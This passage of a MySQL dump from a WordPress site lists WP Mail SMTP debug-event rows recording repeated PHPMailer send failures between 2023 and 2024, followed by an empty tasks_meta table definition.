function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-06-10 23:33:50'),(801,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2025}',0,'2023-06-18 17:09:41'),(802,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2025}',0,'2023-06-18 17:09:41'),(803,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2025}',0,'2023-06-18 17:09:41'),(804,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2025}',0,'2023-06-18 17:09:41'),(805,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2025}',0,'2023-06-18 17:10:29'),(806,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2025}',0,'2023-06-18 17:10:29'),(807,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2025}',0,'2023-06-18 17:10:29'),(808,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2025}',0,'2023-06-18 17:10:29'),(809,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2025}',0,'2023-06-18 17:10:52'),(810,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2025}',0,'2023-06-18 17:10:52'),(811,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2025}',0,'2023-06-18 17:10:52'),(812,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2025}',0,'2023-06-18 17:10:52'),(813,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-06-22 21:37:06'),(814,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-06-22 21:37:06'),(815,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-06-22 22:26:20'),(816,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-06-22 22:26:20'),(817,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-06-23 19:30:19'),(818,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-06-23 19:30:19'),(819,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-01 04:32:37'),(820,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-01 04:32:37'),(821,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-04 00:04:43'),(822,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-04 00:04:43'),(823,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-04 19:06:06'),(824,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-04 19:06:06'),(825,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-07 07:17:49'),(826,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-07 07:17:49'),(827,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-12 19:23:35'),(828,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-12 19:23:35'),(829,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2025}',0,'2023-07-14 15:46:41'),(830,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2025}',0,'2023-07-14 15:46:41'),(831,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2025}',0,'2023-07-14 15:46:41'),(832,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2025}',0,'2023-07-14 15:46:41'),(833,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-14 22:59:13'),(834,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-14 22:59:13'),(835,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-18 11:25:58'),(836,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-18 11:25:58'),(837,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-19 06:11:43'),(838,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-19 06:11:43'),(839,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2025}',0,'2023-07-21 23:27:46'),(840,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2025}',0,'2023-07-21 23:27:46'),(841,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2025}',0,'2023-07-21 23:27:46'),(842,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2025}',0,'2023-07-21 23:27:46'),(843,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-22 04:42:00'),(844,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-22 04:42:00'),(845,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-22 17:32:44'),(846,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-22 17:32:44'),(847,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-28 11:35:38'),(848,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-28 11:35:38'),(849,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-29 11:31:32'),(850,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-29 11:31:32'),(851,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-30 11:04:14'),(852,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-30 11:04:15'),(853,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-31 07:06:51'),(854,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-07-31 07:06:51'),(855,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-08-01 20:05:18'),(856,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-08-01 20:05:18'),(857,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-08-01 21:37:06'),(858,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-08-01 21:37:06'),(859,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-08-04 20:34:28'),(860,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-08-04 20:34:28'),(861,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-08-06 23:58:31'),(862,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-08-06 23:58:31'),(863,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-08-09 14:50:46'),(864,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-08-09 14:50:46'),(865,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-08-09 20:14:04'),(866,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-08-09 20:14:04'),(867,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-08-12 15:09:17'),(868,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-08-12 15:09:17'),(869,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-08-12 18:36:10'),(870,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-08-12 18:36:10'),(871,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-08-13 12:21:43'),(872,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-08-13 12:21:43'),(873,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-08-14 09:23:05'),(874,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-content\\/themes\\/Divi\\/includes\\/builder\\/module\\/ContactForm.php\",\"line\":640}',0,'2023-08-14 09:23:05'),(875,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2023-12-13 17:27:46'),(876,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2023-12-13 17:27:46'),(877,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2023-12-13 17:27:46'),(878,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2023-12-13 17:27:46'),(879,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:34:49'),(880,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:34:49'),(881,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:34:49'),(882,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:34:49'),(883,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:35:21'),(884,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:35:21'),(885,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:35:21'),(886,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:35:21'),(887,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:35:59'),(888,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:35:59'),(889,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:35:59'),(890,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:35:59'),(891,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:36:48'),(892,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:36:48'),(893,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:36:48'),(894,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:36:48'),(895,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:37:03'),(896,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:37:03'),(897,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:37:03'),(898,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:37:03'),(899,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:37:38'),(900,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:37:39'),(901,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:37:39'),(902,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:37:39'),(903,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:38:23'),(904,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:38:23'),(905,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:38:23'),(906,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:38:23'),(907,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:39:02'),(908,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:39:02'),(909,'Mailer: Other SMTP\r\nPHPMailer was able to connect to SMTP server but failed while trying to send an email.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:39:02'),(910,'Mailer: Other SMTP\r\nCould not instantiate mail function.','{\"file\":\"\\/storage\\/v11800\\/wthtest1\\/public_html\\/wp-includes\\/pluggable.php\",\"line\":2041}',0,'2024-02-14 20:39:02');
/*!40000 ALTER TABLE `wp_wpmailsmtp_debug_events` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wpmailsmtp_tasks_meta`
--

DROP TABLE IF EXISTS `wp_wpmailsmtp_tasks_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wpmailsmtp_tasks_meta` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `action` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `data` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wpmailsmtp_tasks_meta`
--

LOCK TABLES `wp_wpmailsmtp_tasks_meta` WRITE;
/*!40000 ALTER TABLE `wp_wpmailsmtp_tasks_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wpmailsmtp_tasks_meta` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
